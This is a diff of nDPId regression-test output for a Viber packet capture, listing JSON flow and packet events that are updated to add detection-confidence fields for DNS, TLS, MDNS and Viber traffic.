+00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646968,"flow_last_seen":1527155646968,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1527155646968,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_805741c9._sub._googlecast._tcp.local"}}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1527155646968,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"ts_msec":1527155646968,"pkt":"AQBeAAD7MAdNo1+nCABFAABZHwxAAP8RutLAqAAR4AAA+xTpFOkARSvHAAQAAAACAAAAAAAACV84MDU3NDFDOQRfc3ViC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAcAbAAwAAQ=="}
 00549{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1527155647500,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1527155647500,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"ts_msec":1527155647500,"pkt":"MzMAAAACMAdNo1+nht1gAAAAABA6\/\/6AAAAAAAAAMgdN\/\/6jX6f\/AgAAAAAAAAAAAAAAAAAChQDAigAAAAABATAHTaNfpw=="}
-00584{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1527155647500,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1527155647500,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1527155647500,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"ts_msec":1527155647500,"pkt":"MzMAAAACMAdNo1+nht1gAAAAABA6\/\/6AAAAAAAAAMgdN\/\/6jX6f\/AgAAAAAAAAAAAAAAAAAChQDAigAAAAABATAHTaNfpw=="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648481,"flow_last_seen":1527155648481,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1527155648481,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1527155648481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1527155648481,"pkt":"AA6OMNv9MAdNo1+nCABFAABEJLZAAEARlILAqAARwKgAD61YADUAMDkH00kBAAABAAAAAAAAB3ZlbmV0aWEDaWFkBmFwcGJveQNjb20AAAEAAQ=="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648481,"flow_last_seen":1527155648481,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1527155648481,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648481,"flow_last_seen":1527155648481,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1527155648481,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1527155648506,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":183,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":183,"pkt_l4_len":149,"ts_msec":1527155648506,"pkt":"MAdNo1+nAA6OMNv9CABFAACpXKlAAEARXCrAqAAPwKgAEQA1rVgAlY7c00mBgAABAAUAAAAAB3ZlbmV0aWEDaWFkBmFwcGJveQNjb20AAAEAAcAMAAUAAQAAAQIAGQF5A3NzbAZnbG9iYWwGZmFzdGx5A25ldADANAABAAEAAAAdAASXZQGCwDQAAQABAAAAHQAEl2VBgsA0AAEAAQAAAB0ABJdlgYLANAABAAEAAAAdAASXZcGC"}
-00756{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":211,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1527155648506,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.1.130"}}
+00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":211,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1527155648506,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.1.130"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648513,"flow_last_seen":1527155648513,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1527155648513,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1527155648513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155648513,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8cjBAAEAGbuvAqAARl2UBgtnCAbvgBRgtAAAAAKAC\/\/+wcAAAAgQFtAQCCAoAIWodAAAAAAEDAwc="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1527155648523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155648523,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAADoG5xuXZQGCwKgAEQG72cJzm\/EW4AUYLqAScSBKVAAAAgQFtAQCCArIDMgpACFqHQEDAwk="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1527155648526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1527155648526,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0cjFAAEAGbvLAqAARl2UBgtnCAbvgBRguc5vxF4AQAq3nkgAAAQEICgAhaiDIDMgp"}
-00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155648513,"flow_last_seen":1527155648533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1527155648533,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"venetia.iad.appboy.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155648513,"flow_last_seen":1527155648533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1527155648533,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"venetia.iad.appboy.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1527155666982,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"ts_msec":1527155666982,"pkt":"AQBeAAD7MAdNo1+nCABFAABZIsxAAP8RtxLAqAAR4AAA+xTpFOkARSvGAAUAAAACAAAAAAAACV84MDU3NDFDOQRfc3ViC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAcAbAAwAAQ=="}
-00605{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670632,"flow_last_seen":1527155670632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1527155670632,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1527155670632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155670632,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8WoBAAEAGCJrAqAAREskEILFwAbuQXSU3AAAAAKAC\/\/+HxQAAAgQFtAQCCAoAIX+3AAAAAAEDAwc="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":180000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1527155670640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAEdfMxAAEAR5NnAqAAREskEILhDHzEBCRHz7fYBAAUArBk1jI9k5EcHridUEQCowEO4MgAAAEMBABABAK45kpFjAQAAAAAAACXfTU7hzTcbXJq8JtnTC0sBuzmzAAAAAAAAAAADAAEAZgIAZwABeAAAAAAAAIAAvcYFlBohustZk1e\/8OyZiSqP86k39WGwDkG7f\/rMnT2tcfHi3zlsEfu0kKTP5bAY2qxB7\/oc6uBQ0Wmie0yDB6f1EwNZ4BrIBNZIXKB4sgy96MQL790EZYw7fY9vCydMCFozrGypXQPtcVrV5xCrsYqA8zuDlnCD1lV04sfnGYMAAAAAAAAAAEcFAAA4AAAAEABBbmRyb2lkLDguOS4wLjIAAAA="}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":180000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","ndpi": {"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":180000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1527155670640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAA+fM1AAEAR5bfAqAAREskEILhDHzMAKi7T7fYZAKwZNYyPZORHJd9NTuHNNxtcmrwm2dMLSwG7ObMAAA=="}
-00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","ndpi": {"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
+00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1527155670640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAAwfM5AAEAR5cTAqAAREskEILhDHzEAHFuJ7fYJALM5kpFjAQAArBk1jI9k5Ec="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1527155670663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155670663,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAACsGeBoSyQQgwKgAEQG7sXDMrFlhkF0lOKASaN8nuwAAAgQFtAQCCAoAWtCxACF\/twEDAwc="}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1527155670672,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1527155670672,"pkt":"MAdNo1+nAA6OMNv9CABFAAAwfVFAACsR+skSyQQgwKgAER8zuEMAHAAy7fYaAKwZNYyPZORHMkN8XkO4AMg="}
@@ -107,17 +107,17 @@
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1527155671066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155671066,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8FY9AAEAG0gLAqAARNrtbtr+YAbtog5WsAAAAAKAC\/\/+1DQAAAgQFtAQCCAoAIYAjAAAAAAEDAwc="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1527155671237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1527155671237,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYGQZE2u1u2wKgAEQG7v5iCE\/ghaIOVraASaN+HqAAAAgQFtAQCCAosBh44ACGAIwEDAwg="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1527155671240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1527155671240,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0FZBAAEAG0gnAqAARNrtbtr+YAbtog5WtghP4IoAQAq0cfAAAAQEICgAhgE8sBh44"}
-00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155671066,"flow_last_seen":1527155671250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1527155671250,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
-00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1629,"flow_avg_l4_payload_len":271,"midstream":0,"ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
